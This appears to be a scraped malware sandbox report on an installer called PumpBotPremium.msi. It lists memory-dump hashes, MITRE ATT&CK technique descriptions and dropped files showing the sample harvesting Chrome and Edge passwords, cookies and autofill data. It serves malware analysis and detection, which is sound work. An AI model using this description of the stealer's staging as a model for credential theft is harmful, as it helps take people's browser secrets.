$^q, xrefs: 07763DD2
$^q, xrefs: 07763DDE

Memory Dump Source

Source File: 0000000B.00000002.2054326235.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7760000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q
API String ID: 0-2049395529
Opcode ID: 64c6549a423a0771fdacc25dccf114ce9b55f8fd155435c0b26327f480bf87ed
Instruction ID: 43e7385a831e52b76297452f5aab1b4cee959fa4e224a0f073e0b469f1c7d011
Opcode Fuzzy Hash: 64c6549a423a0771fdacc25dccf114ce9b55f8fd155435c0b26327f480bf87ed
Instruction Fuzzy Hash: BC018461B0D3865FC72A172818241566F729FC355071945DBC581CF29FCD598C49C363

Analysis Process: powershell.exePID: 2756, Parent PID: 7992COMMON

Executed Functions

Function 04647600 Relevance: .5, Instructions: 537COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1971420674.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4640000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: baec6d40c450461d082d3ba84f05dacd293f6447637e5730e685782414adc34c
Instruction ID: ecd2f35b0cce566345b3ac064004b968f994a4acca9fd24ad6089da6f73b8cd4
Opcode Fuzzy Hash: baec6d40c450461d082d3ba84f05dacd293f6447637e5730e685782414adc34c
Instruction Fuzzy Hash: E7227E34A01248DFCB15DFA8D484AADBBF2FF89311F1580A9E445AB362D735ED85CB90

Function 046432C0 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1971420674.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4640000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab0b5235261687936266869a31258b4f6184ad16fbf69f6227d063ab107eb58f
Instruction ID: 86e5b3b47b6b032768fdbebaf139da112e35a34bec9f2f192bbbb7ba2a8e7a59
Opcode Fuzzy Hash: ab0b5235261687936266869a31258b4f6184ad16fbf69f6227d063ab107eb58f
Instruction Fuzzy Hash: A2918C70A006458FCB06CF99C5949AEFBB1FF88310B2486A9D915AB365D735FC91CFA0

Function 04648308 Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1971420674.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4640000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0f00b4f90688113257077248a75cb08f15efaa2a811b106b3888c4bb58c7f79
Instruction ID: 0ffd8369b8a7a2cd8569f4017af150853df24fe5f3762abaa3570862a808ca28
Opcode Fuzzy Hash: d0f00b4f90688113257077248a75cb08f15efaa2a811b106b3888c4bb58c7f79
Instruction Fuzzy Hash: AE512734B01614CFDB24AB78C854B6D77F2AF89644F1405A9D00AEB3A0EF399D82CF11

Function 046481F3 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1971420674.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4640000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9157e3f36fb2c0d68eecf366ad45ae7d8395c04acf6ddf398399ca3891c8cadc
Instruction ID: a9cee6ebb0919dadab88f6f0899cdd5a3c3558fb2183d14ecf0cdcac868565de
Opcode Fuzzy Hash: 9157e3f36fb2c0d68eecf366ad45ae7d8395c04acf6ddf398399ca3891c8cadc
Instruction Fuzzy Hash: 4E31EA74A011198FDB29DF69CD90F99B7F2BF84204F1146E5D108AB3A5DA34DE85CF90

Function 04647858 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1971420674.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4640000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d007f9ad4fa9cd17a915a85cb0091ae87b76ff96b489c5afa1347a19ca0d75b7
Instruction ID: 15ebbf0954e4a6109bfe8bbd0467d1930b249cacda9583b87e77806a9a7d9fb3
Opcode Fuzzy Hash: d007f9ad4fa9cd17a915a85cb0091ae87b76ff96b489c5afa1347a19ca0d75b7
Instruction Fuzzy Hash: E911D2B4E002199FCB04DF98C9809AEFBB5FF88310B1585A9E909AB355D731FD41CBA0

Function 02DED01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1971053399.0000000002DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2ded000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b5164cd726ebd18b48de5403365812c5124f983ed681602ad257ceb88659231
Instruction ID: bc6f31b18eaa85d697d9b41cdde4e1258726366dea90ee0e3fc5315f39123d81
Opcode Fuzzy Hash: 6b5164cd726ebd18b48de5403365812c5124f983ed681602ad257ceb88659231
Instruction Fuzzy Hash: B301F7314093409AEB106A25CD84767BF9CDF41324F2CC42AEC4A0B346CB79DC41C6B1

Function 02DED005 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1971053399.0000000002DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2ded000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1c4cf54721f074908568f52f80a07ed7b653a0d1a52cc4c85a6484da4f47197
Instruction ID: 2370183bb55699fce2eb42c8c72b049aa8787ca773b2f9f080a6afff73c31be4
Opcode Fuzzy Hash: b1c4cf54721f074908568f52f80a07ed7b653a0d1a52cc4c85a6484da4f47197
Instruction Fuzzy Hash: BF014C6140E3C09ED7128B258C94B52BFB8EF43224F1DC1DBD8888F2A3C6699849C772

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Drive: Drive Creation, File: File Access, File: File Creation, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PumpBotPremium.msi

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Config.Msi\5c7179.rbs

C:\Config.Msi\5c717b.rbs

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\Xavier\Autofills\Chrome_Default_AFILLS.txt

C:\Users\user\AppData\Local\Temp\Xavier\Autofills\Edge_Default_AFILLS.txt

C:\Users\user\AppData\Local\Temp\Xavier\Caches\Chrome_Default_Local State

C:\Users\user\AppData\Local\Temp\Xavier\Caches\Chrome_Default_afills.db

C:\Users\user\AppData\Local\Temp\Xavier\Caches\Chrome_Default_cookies.db

C:\Users\user\AppData\Local\Temp\Xavier\Caches\Chrome_Default_pass.db

C:\Users\user\AppData\Local\Temp\Xavier\Caches\Edge_Default_Local State

C:\Users\user\AppData\Local\Temp\Xavier\Caches\Edge_Default_afills.db

C:\Users\user\AppData\Local\Temp\Xavier\Caches\Edge_Default_pass.db

C:\Users\user\AppData\Local\Temp\Xavier\Chrome_Default_PASS.txt

C:\Users\user\AppData\Local\Temp\Xavier\Edge_Default_PASS.txt

C:\Users\user\AppData\Local\Temp\Xavier\Infos\Running_Softwares.txt

Windows Analysis Report
PumpBotPremium.msi

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre